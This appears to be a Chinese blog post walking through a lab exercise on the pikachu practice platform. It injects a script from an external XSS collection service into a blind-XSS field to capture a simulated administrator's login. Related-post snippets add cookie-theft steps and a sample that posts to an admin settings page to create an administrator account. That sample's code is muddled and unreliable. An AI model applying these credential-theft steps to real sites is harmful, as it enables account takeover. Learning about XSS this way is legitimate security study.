利用xss获取管理员用户名密码

于 2025-03-05 13:39:35 发布
阅读量163 收藏
点赞数 3
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146039234
版权

1、在网站https://xssaq.com注册账号,并登录

2、在项目操作模块点击创建项目,并输入项目名称

3、点击立即提交后在我们的项目模块里找到自己的项目,点击右上角的查看配置代码,复制script这⼀条代码

4、打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去

5、模拟管理员,登录后台地址

6、输入用户名和密码

7、回到我们的xss平台,刷新,查看,就可以得到刚刚我们模拟管理员的用户名和密码了

xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 2037
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
web漏洞利用---XSS注入攻击
m0_65129142的博客
12-20 5559
XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所以将跨站脚本攻击缩写为XSSXSS注入攻击的原理其实和SQL注入攻击的原理很相似,攻击者将恶意的Script代码插入到网页中,当正常用户浏览该页面时,被嵌入的恶意Script代码就会被执行,从而达到恶意攻击正常用户的目的。 XSS分类 跨站脚本注入漏洞是由于WEB服务器读取了用户可控数据输出到HTML页面的过程中没有进行安全处理
反射性xss的简单利用获取账号密码
m0_46317063的博客
07-06 569
反射性XSS利用获取账号密码
xss盲打(通过xss盲打盗取管理员账号和密码!)
qq_43814486的博客
05-03 6797
原理: 其实和一般的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞! 上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下: 1,我输入的payload: <script>documen...
黑客学习-SQL注入(字符型):Hackbar获取网站账号和密码
weixin_49349476的博客
09-27 3316
检查出网站存在的漏洞类型是字符型的SQL漏洞,之后利用火狐浏览中的Hackbar插件,进行SQL注入,获取登录账号和密码
xss获取管理员的用户密码(本地实战)
2301_80661529的博客
02-28 636
有服务器的可以在服务器上实战。进入网页admin_login.html进行实战。实战完成后,在编写的所有文件目录下查找。,上面记录的管理员的账户密码。代码量比较少,就此复制粘贴即可。
php截获用户明文密码,【超详细入门教程】通过xss获取管理员明文账号密码
weixin_34533343的博客
03-16 437
本帖最后由 说书人 于 2019-12-17 03:56 编辑0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了...
渗透测试-xss漏洞之反射型(post)获取用户密码
lza20001103的博客
04-24 3934
xss之反射型(post)获取用户密码
网络安全学习:渗透测试钓鱼案例,夯实基础
kali_Ma的博客
09-02 2788
简介 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 名言: 你对这行的兴趣,决定你在这行的成就! 2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>戳我拿<一 一、前言 网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、
【每天学习一点新知识】XSS如何绕过HttpOnly获取Cookie以及XSS与CORS漏洞利用
RexHa的博客
10-27 7625
Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三种之一,并且HTTP头不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 013-网络安全应急技术与实践(Web层-XSS钓鱼攻击)
热门推荐
时光隧道
02-10 10万+
XSS(跨站脚本)是一种常见的网络攻击技术,攻击者通过在受害者的网页中注入恶意脚本,来获取用户的敏感信息或执行恶意操作。因此,XSS高级钓鱼指的是通过XSS攻击手段来进行钓鱼行为,即通过在网页中注入恶意代码,并伪装成合法的网站或登录页面,从而诱使用户输入敏感信息。
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5753
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
熊海CMS网站SQL注入、XSS攻击、cookie篡改
m0_63917373的博客
11-01 2243
熊海CMS sqlmap工具 SQL注入 XSS cookie篡改
【谨慎学习】手把手教你破解网站管理后台帐号密码_运营管理后台密码
2401_84183545的博客
04-12 2784
在上面的讲解中,我们已经学会了如何去获得后台的相关登录界面信息,接下来我们开始对获得的登录界面进行攻击操作,在此为了方便演示我们将以爆破路由器的后台管理界面为例,在执行下面的操作时,因为要使用 burpsuite 工具,所以我们需要安装一个Kali系统(可以使用虚拟机安装),具体安装过程这里不论述,请读者自行下载安装。在上面的情况中,因为ID和密码都是正确的,所以我们很轻松的就获得了这些信息,那么如果管理员输入的账户ID 是正确的而密码是错误的,我们又应该怎么操作呢?
网站忘记管理员密码怎么办?
冷陌的专栏
07-05 1255
第二种方式,如果你的数据库没有salt这个字段,那么直接在password选项框选择md5然后在后面第二个框输入明文密码如:123456保存即可,你的管理员密码则是123456。第一条修改为:322d3fef02fc39251436cb4522d29a71。保存数据,然后登录器你的后台,密码则是123456。其次找到你的管理员账号进行编辑。第二条修改为:abc。
利用sqlmap注入获取网址管理员账号密码
WINDY_PACE的博客
04-21 6785
sqlmap 靶场的攻击注入利用
获取网站管理员账号 php,【超详细入门教程】通过xss获取管理员明文账号密码...
weixin_29290259的博客
04-09 2819
0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了,也就是说xss无法读取到cookie了(除了包含登录信息外的co...
js获取header_【超详细入门教程】通过xss获取管理员明文账号密码
weixin_39662611的博客
12-01 752
0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了,也就是说xss无法读取到cookie了(除了包含登...
如何利用XSS存储型漏洞,利用xmlhttp.open函数对http://192.168.1.3:8007/admin/admin_usersetting.asp地址发送post请求添加管理员用户,使用添加的管理员用户登录成功
最新发布
12-06
利用XSS(跨站脚本攻击)存储型漏洞,通常发生在前端页面接收用户输入并在未经过充分过滤的情况下直接拼接到HTML中。这种情况下,恶意用户可以注入执行脚本的HTML片段,使得攻击者能够间接控制浏览器的行为。 假设我们已经获取到了一个存储型XSS漏洞的可控制值,例如在一个表单提交中,我们可以尝试构造一个包含恶意脚本的POST数据: ```html <script>alert('XSS Vulnerability!');</script> <!-- 隐藏的恶意脚本 --> <form action="http://192.168.1.3:8007/admin/admin_usersetting.asp" method="POST"> <input type="hidden" name="admin_username" value="malicious_username_here"> <input type="hidden" name="admin_password" value="malicious_password_here"> </form> ``` 当用户点击此表单后,实际发起的POST请求将会携带这些隐藏的输入参数: ```javascript var xhr = new XMLHttpRequest(); xhr.open('POST', 'http://192.168.1.3:8007/admin/admin_usersetting.asp', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); // 注意:对于XSS注入,通常不需要设置Content-Type为JSON // XSS注入的管理员名和密码 var adminUsername = document.getElementById('malicious_username').innerText; var adminPassword = document.getElementById('malicious_password').innerText; var params = `admin_username=${adminUsername}&admin_password=${adminPassword}`; xhr.send(params); ``` 这里我们利用`document.getElementById`获取到恶意脚本元素内的值作为用户名密码。 请注意,这只是一个理论示例,实际操作中,由于XSS攻击是在服务器渲染后的HTML中生效,你无法直接利用`document.getElementById`获取到恶意值。真实情况下,你应该从服务器的响应中提取这些值,这通常涉及到更复杂的网络抓包工具或者自动化测试框架。 至于登录阶段,如果你能获取管理员用户的凭证(可能是通过XSS或者其他手段),你可以按照类似的方式发送登录请求。然而,为了保证安全性,建议在生产环境中对所有用户输入进行严格的验证和清理,防止此类漏洞发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值